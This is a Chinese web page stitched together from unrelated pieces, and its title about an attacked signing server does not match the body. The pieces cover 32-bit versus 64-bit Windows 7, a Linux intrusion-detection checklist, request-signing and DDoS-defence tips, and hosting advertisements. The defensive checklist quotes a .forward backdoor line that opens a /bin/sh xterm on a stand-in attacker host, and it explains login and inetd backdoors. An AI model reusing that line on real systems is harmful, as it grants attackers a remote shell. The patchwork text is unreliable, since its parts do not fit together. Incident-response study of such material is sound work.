运行软件提示服务签名无效_签名服务器被攻击

hacker|
171

笔记本装系统w7是32位,还是64位,之前XP是32位的,是不是装错了?

如果您是讲求效率的看客,那么请走快速通道,一句话帮您下决心,不过如果您想对32位和64位有更深一步的了解,那不妨走完整通道,看完整篇文章。

【快速通道】:如果您平时并不热衷于玩游戏,而工作中又涉及到大量的在虚拟环境下开发的情况,并且需要计算机的物理内存大于3GB,那么不妨安装64位系统试试;反之,如果您是游戏发烧友,平时并不需要那么大的内存(3G内存完全可以满足基本应用),则尝试一下32位系统。

【完整通道】:为什么在快速通道中,我们把内存的条件阀值定为3G呢?其实这和32位系统构架有关,且听我慢慢道来。

关于32位和64位系统的差别,那真是说来话长,这里我们首先要了解一下CPU的架构技术,通常我们可以看到在计算机硬件上会有X86和X64的标识,其实这是两种不同的CPU硬件架构,x86代表32位操作系统 x64代表64位操作系统。那么这个32位和64位中的“位”又是什么意思呢?相对于32位技术而言,64位技术的这个位数指的是CPU GPRs(General-Purpose Registers,通用寄存器)的数据宽度为64位,64位指令集就是运行64位数据的指令,也就是说处理器一次可以运行64bit数据。举个通俗易懂但不是特别准确的例子:32位的吞吐量是1M,而64位吞吐量是2M。

64位计算有两大优点可取:可以以进行更大范围的整数运算;可以支持更大的内存。但不能因为数字上的变化,而简单的认为64位处理器的性能是 32位处理器性能的两倍。实际上在32位应用下,32位处理器的性能甚至会更强,即使是64位处理器,目前情况下也是在32位应用下性能更强。所以说不要迷恋64位,64位不是一个传说,我们要清晰地分析后再决定使用32位还是64位。

大家是不是有些迷茫了?到底什么时候选择64位,什么时候选择32位?我们分成几部分来给大家逐一解释。

我们先说说内存,为什么32位的系统只能显示3G内存(实际上是3.25G)呢?这是由于系统本身的限制所造成的。32位系统对于内存的寻址能力总共就4G,而4G里还要放其他东西:比如系统 BIOS,输入输出设备的地址和设定,各类接口的设定和地址等等,这些地址和设定所占用的空间要达到700M左右,因此4G内存在32位中也只能显示出3G了,但是剩下的那些内存其实也没有被浪费掉。

那么,是不是32位系统就真的不能识别出4G内存了?也不是。我们知道在内存中会有700多MB的空间被硬件地址或接口所占用,那我们能不能通过某种手段,让它们去占用硬盘上的空间(类似虚拟内存),而不占用物理内存,这样4G内存不就可以完全被识别了么?没错,这种方法的确可行,于是现在有了一种名为PAE的技术,中文叫做物理地址扩展,这是硬件设备上提供的技术,不过这种技术需要系统的支持,比如32位的Windows Server 2003可以很好的支持这个技术,但是Vista的支持就不太好,至于Windows 7,大家可以用用看。

因此,我在快速通道中并没有说只要大于3G内存就必须装64位系统,这还得看你的实际工作或使用需求。

除了和内存有关以外,64位技术还和硬件有关,主板首先要支持4G(945以前的主板有的不支持4G内存,这样即便是64位系统也无法识别4G内存),另外处理器(CPU)也需要是64位的,有人会把双核和64位CPU搞混,这里我要强调一下,双核和64位是两种不同的概念,双核指的是物理上有两个CPU,而64位是一种技术,不是说只要是双核就一定是64位,比如奔腾D系列中就有32位的双核(目前酷睿2双核倒基本上都是64位),而64位其实也分两种,一种是我们常说的x64,还有一种是Intel的安腾CPU,这是专门针对大型服务器的64位处理器(64位的客户端版本根本装不上,只能装服务器版本)。

如果有了这些硬件的支持,那么很好,你已经可以开始考虑使用64位的系统了,不过接下来是最重要的,就是我们要了解使用64位可能会有什么样的风险。总的来说,我们要考虑下列四个问题。

1. 是不是有更好的性能?

2. 兼容性如何?

3. 可靠性和安全性如何?

4. 需不需要花更多钱?

关于第一个问题,文章开始我们就谈了,有的时候32位系统的性能可能会比64位更好。我们习惯于从经验上来推断,8位到16位,16位到32位,电脑的性能都得到了提升,但64位的性能提升如何,目前还不好下定论,这是因为只有应用了64位优化的64位程序才会有性能提升,而目前大多数的Windows应用程序并没有做这个优化,而32位应用跑在64位系统时逻辑上会花费更多时间(真实测试时的区别很微小)。

有人看到近段时间出现了大量的64位应用程序,不过需要注意的是,这些应用程序的出现不是为了提升性能,而是为了解决32位程序在64位系统上的不兼容问题。当然,我相信这种经过64位优化处理的软件会越来越多,毕竟64位是一种方向,早晚的事。

第二个问题很重要,兼容性好坏是一个系统上天堂或是下地狱的重要因素,在Windows 7中,32位的系统兼容性非常出色,不过64位的系统兼容性依然有一定的风险,虽然已经有很多软件已经更新到兼容于64位的版本,但是用户依然要在64位的系统上运行大量的32位软件,这就有可能带来风险。在32位系统中,程序运行所需要的DLL(动态链接库)储存在C:\的Windows\System32下,而64位系统中32位库在C:\的Windows\SysWow64中。32位程序试图从system32中加载库的时候,WOW64(Windows On Windows 64-bit)负责重定向他。同样,程序在调用注册表时也是需要进行一次重定向,WoW64重定向HKLM\Software到HKLM\Software\Wow6432Node,WoW64相比其他的虚拟化机制,更能保证软件兼容性,通常,这些重定向工作的很好,但是任何复杂层都可能造成不可预见的问题,这个问题的表现就是不兼容。另外,如果你的电脑中还有16位的软件,那么在64位的系统中将会肯定的不兼容,这也是我们需要提前考虑的问题。

关于硬件的兼容性,通过我们之前的测试可以看到,整体Windows 7的硬件兼容型表现很好(大约90%以上的硬件都可以兼容),不过这是指的32位的系统,在64位的系统下,硬件的兼容性目前要低于32位系统,不过相信这一现象将会随着64位的发展而逐渐好转。

关于兼容性,推荐给大家两个地址,一个软件兼容性清单,一个硬件兼容性清单,非常实用,而且是微软官方提供的哦。

第三个问题是关于稳定性和安全性的,在64位系统中,安全性有了更大程度的提升,PatchGuard(安全内核)和DEP(数据执行保护)可以保住系统抵御类似缓冲溢出攻击之类的恶意行为,不过安全这种问题可不是单纯靠技术就能搞定的。而在稳定性上来说,理论上64位的稳定性应该优于32位,不过在使用时却没有体验到这样的感觉。主要问题出现在不兼容的软件和驱动上面,这种不兼容情况甚至会带来蓝屏的后果,即便是要求驱动需要签署数字签名,这种现象目前也没有看到太大好转。

第四个问题是大家最关心的,我有了32位系统,想要安装64位系统时是不是需要再次花钱购买?买过零售彩盒包装(FPP)的朋友应该知道,在Windows 7中,32位系统和64位系统在进行激活时使用的是同一个许可授权(也就是我们常说的Key),而零售版中也通常会同时含有32位和64位两套介质(家庭普通版在国内好像并未提供64位介质,但是如果你下载了64位的映像是可以安装的),你可以决定安装哪种系统。如果没有64位介质,也可以联系经销商进行单独的介质购买。不过需要特别说明的是,零售版只能够同时安装一个系统,如果你已经激活了你的32位系统,你需要拨打微软800电话进行注销,然后再激活你的64位系统。

参考了以上四点,相信大家也都有了一个基本的了解,何去何从也应该心里有谱了,我再总结一下,要实现真正意义上的64位计算,光有64位的处理器是不行的,还必须得有64位的操作系统以及64位的应用软件才行,三者缺一不可,缺少其中任何一种要素都是无法实现64位计算的。另外,大家也要考虑现实情况,64位是趋势,但是是否现在就亲自去体验,还要好好盘算盘算。当然,如果你还没下定决心,也不要闲着你的电脑,我们可以在64位的硬件上先安装32位的Windows 7体验着,不过如果咱的硬件是32位的,那可是绝对无法安装64位的Windows 7,话说这就是传说中的“向下兼容”。

Linux服务器是否被攻击怎么判断

1、检查系统密码文件

首先从明显的入手,查看一下passwd文件,ls –l /etc/passwd查看文件修改的日期。

检查一下passwd文件中有哪些特权用户,系统中uid为0的用户都会被显示出来。

1

   

awk –F:’$3==0 {print $1}’ /etc/passwd

   

顺便再检查一下系统里有没有空口令帐户:

1

   

awk –F: ‘length($2)==0 {print $1}’ /etc/shadow

   

2、查看一下进程,看看有没有奇怪的进程

重点查看进程:ps –aef | grep inetd

inetd是UNIX系统的守护进程,正常的inetd的pid都比较靠前,如果你看到输出了一个类似inetd –s /tmp/.xxx之类的进程,着重看inetd –s后面的内容。在正常情况下,LINUX系统中的inetd服务后面是没有-s参数的,当然也没有用inetd去启动某个文件;而solaris系统中也仅仅是inetd –s,同样没有用inetd去启动某个特定的文件;如果你使用ps命令看到inetd启动了某个文件,而你自己又没有用inetd启动这个文件,那就说明已经有人入侵了你的系统,并且以root权限起了一个简单的后门。

输入ps –aef 查看输出信息,尤其注意有没有以./xxx开头的进程。一旦发现异样的进程,经检查为入侵者留下的后门程序,立即运行kill –9 pid 开杀死该进程,然后再运行ps –aef查看该进程是否被杀死;一旦此类进程出现杀死以后又重新启动的现象,则证明系统被人放置了自动启动程序的脚本。这个时候要进行仔细查找:find / -name 程序名 –print,假设系统真的被入侵者放置了后门,根据找到的程序所在的目录,会找到很多有趣的东东J

UNIX下隐藏进程有的时候通过替换ps文件来做,检测这种方法涉及到检查文件完整性,稍后我们再讨论这种方法。

接下来根据找到入侵者在服务器上的文件目录,一步一步进行追踪。

3、检查系统守护进程

检查/etc/inetd.conf文件,输入:cat /etc/inetd.conf | grep –v “^#”,输出的信息就是你这台机器所开启的远程服务。

一般入侵者可以通过直接替换in.xxx程序来创建一个后门,比如用/bin/sh 替换掉in.telnetd,然后重新启动inetd服务,那么telnet到服务器上的所有用户将不用输入用户名和密码而直接获得一个rootshell。

4、检查网络连接和监听端口

输入netstat -an,列出本机所有的连接和监听的端口,查看有没有非法连接。

输入netstat –rn,查看本机的路由、网关设置是否正确。

输入 ifconfig –a,查看网卡设置。

5、检查系统日志

命令last | more查看在正常情况下登录到本机的所有用户的历史记录。但last命令依赖于syslog进程,这已经成为入侵者攻击的重要目标。入侵者通常会停止系统的syslog,查看系统syslog进程的情况,判断syslog上次启动的时间是否正常,因为syslog是以root身份执行的,如果发现syslog被非法动过,那说明有重大的入侵事件。

在linux下输入ls –al /var/log

在solaris下输入 ls –al /var/adm

检查wtmp utmp,包括messgae等文件的完整性和修改时间是否正常,这也是手工擦除入侵痕迹的一种方法。

6、检查系统中的core文件

通过发送畸形请求来攻击服务器的某一服务来入侵系统是一种常规的入侵方法,典型的RPC攻击就是通过这种方式。这种方式有一定的成功率,也就是说它并不能100%保证成功入侵系统,而且通常会在服务器相应目录下产生core文件,全局查找系统中的core文件,输入find / -name core –exec ls –l {} \; 依据core所在的目录、查询core文件来判断是否有入侵行为。

7、.rhosts和.forward

这是两种比较著名的后门文件,如果想检查你的系统是否被入侵者安装了后门,不妨全局查找这两个文件:

find / -name “.rhosts” –print

find / -name “.forward” –print

在某用户的$HOME下,.rhosts文件中仅包含两个+号是非常危险的,如果你的系统上开了513端口(rlogin端口,和telnet作用相同),那么任意是谁都可以用这个用户登录到你的系统上而不需要任何验证。

看到这里如果想要深入的做安全加固服务以及安全部署

就必须找专业做服务器的安全公司来处理了国内也就Sine安全和绿盟比较专业提供。

Unix下在.forward文件里放入命令是重新获得访问的常用方法在某一 用户$HOME下的.forward可能设置如下:

\username|"/usr/local/X11/bin/xterm -disp hacksys.other.dom:0.0 –e /bin/sh"

这种方法的变形包括改变系统的mail的别名文件(通常位于/etc/aliases). 注意这只是一种简单的变换. 更为高级的能够从.forward中运行简单脚本实现在标准输入执行任意命令(小部分预处理后).利用smrsh可以有效的制止这种后门(虽然如果允许可以自运行的elm's filter或procmail类程序, 很有可能还有问题。在Solaris系统下,如果你运行如下命令:

ln -s /var/mail/luser ~/.forward

然后设置vacation有效,那么/var/mail/luser就会被拷贝到~/.forward,同时会附加"|/usr/bin/vacation me",旧的symlink被移到~/.forward..BACKUP中。

直接删除掉这两个文件也可以。

8、检查系统文件完整性

检查文件的完整性有多种方法,通常我们通过输入ls –l 文件名来查询和比较文件,这种方法虽然简单,但还是有一定的实用性。但是如果ls文件都已经被替换了就比较麻烦。在LINUX下可以用rpm –V `rpm –qf 文件名` 来查询,国家查询的结果是否正常来判断文件是否完整。在LINUX下使用rpm来检查文件的完整性的方法也很多,这里不一一赘述,可以man rpm来获得更多的格式。

UNIX系统中,/bin/login是被入侵者经常替换作为后门的文件,接下来谈一下login后门 :

UNIX里,Login程序通常用来对telnet来的用户进行口令验证。入侵者获取login的源代码并修改,使它在比较输入口令与存储口令时先检查后门口令。如果用户敲入后门口令,它将忽视管理员设置的口令让你长驱直入:这将允许入侵者进入任何账号,甚至是root目录。由于后门口令是在用户真实登录并被日志记录到utmp和wtmP前产生的一个访问,所以入侵者可以登录获取shell却不会暴露该账号。管理员注意到这种后门后,使用”strings”命令搜索login程序以寻找文本信息。许多情况下后门口令会原形毕露。入侵者又会开始加密或者更改隐藏口令,使strings命令失效。所以许多管理员利用MD5校验和检测这种后门。UNIX系统中有md5sum命令,输入md5sum 文件名检查该文件的md5签名。它的使用格式如下:md5sum –b 使用二进制方式阅读文件;md5sum –c 逆向检查MD5签名;md5sum –t 使用文本方式阅读文件。

在前面提到过守护进程,对于守护进程配置文件inetd.conf中没有被注释掉的行要进行仔细比较,举个简单的例子,如果你开放了telnet服务,守护进程配置文件中就会有一句:telnet stream tcp nowait root /usr/sbin/in.telnetd in.telnetd

可以看到它所使用的文件是 /usr/sbin/in.telnetd,检查该文件的完整性,入侵者往往通过替换守护进程中允许的服务文件来为自己创建一个后门。

LINUX系统中的/etc/crontab也是经常被入侵者利用的一个文件,检查该文件的完整性,可以直接cat /etc/crontab,仔细阅读该文件有没有被入侵者利用来做其他的事情。

不替换login等文件而直接使用进程来启动后门的方法有一个缺陷,即系统一旦重新启动,这个进程就被杀死了,所以得让这个后门在系统启动的时候也启动起来。通常通过检查/etc/rc.d下的文件来查看系统启动的时候是不是带有后门程序;这个方法怎么有点象查windows下的trojan?

说到这里,另外提一下,如果在某一目录下发现有属性为这样的文件:-rwsr-xr-x 1 root root xxx .sh,这个表明任何用户进来以后运行这个文件都可以获得一个rootshell,这就是setuid文件。运行 find –perm 4000 –print对此类文件进行全局查找,然后删除这样的文件。

9、检查内核级后门

如果你的系统被人安装了这种后门,通常都是比较讨厌的,我常常就在想,遇到这种情况还是重新安装系统算了J,言归正传,首先,检查系统加载的模块,在LINUX系统下使用lsmod命令,在solaris系统下使用modinfo命令来查看。这里需要说明的是,一般默认安装的LINUX加载的模块都比较少,通常就是网卡的驱动;而solaris下就很多,没别的办法,只有一条一条地去分析。对内核进行加固后,应禁止插入或删除模块,从而保护系统的安全,否则入侵者将有可能再次对系统调用进行替换。我们可以通过替换create_module()和delete_module()来达到上述目的。另外,对这个内核进行加固模块时应尽早进行,以防系统调用已经被入侵者替换。如果系统被加载了后门模块,但是在模块列表/proc/module里又看不到它们,有可能是使用了hack工具来移除加载的模块,大名鼎鼎的knark工具包就有移除加载模块的工具。出现这种情况,需要仔细查找/proc目录,根据查找到的文件和经验来判断被隐藏和伪装的进程。Knark后门模块就在/proc/knark目录,当然可能这个目录是隐藏的。

服务端如何防止别人模拟请求,服务器被攻击

客户端请求时加上一个对随机数的签名,服务器端验证,算法不公开。这样对所有签名不对的请求,立即关闭连接。

服务器如何防御ddos攻击?

一、确保服务器系统安全

云霸天下IDC高防

1、确保服务器的系统文件是最新的版本,并及时更新系统补丁。

2、管理员需对所有主机进行检查,知道访问者的来源。

3、关闭不必要的服务:在服务器上删除未使用的服务,关闭未使用的端口。

4、限制同时打开的SYN半连接数目,缩短SYN半连接的time out 时间,限制SYN/ICMP流量。

5、正确设置防火墙,在防火墙上运行端口映射程序或端口扫描程序。

6、认真检查网络设备和主机/服务器系统的日志。只要日志出现漏洞或是时间变更,那这台机器就可能遭到了攻击。

7、限制在防火墙外与网络文件共享。这样会给黑客截取系统文件的机会,若黑客以特洛伊木马替换它,文件传输功能无疑会陷入瘫痪。

二、其他方法

云霸天下IDC高防IP

1、隐藏服务器真实IP

2、关闭不必要的服务或端口

3、购买高防提高承受能力

4、限制SYN/ICMP流量

5、网站请求IP过滤

6、部署DNS智能解析

7、提供余量带宽

目前而言,DDOS攻击并没有最好的根治之法,做不到彻底防御,只能采取各种手段在一定程度上减缓攻击伤害。所以平时服务器的运维工作还是要做好基本的保障。

0条大神的评论

发表评论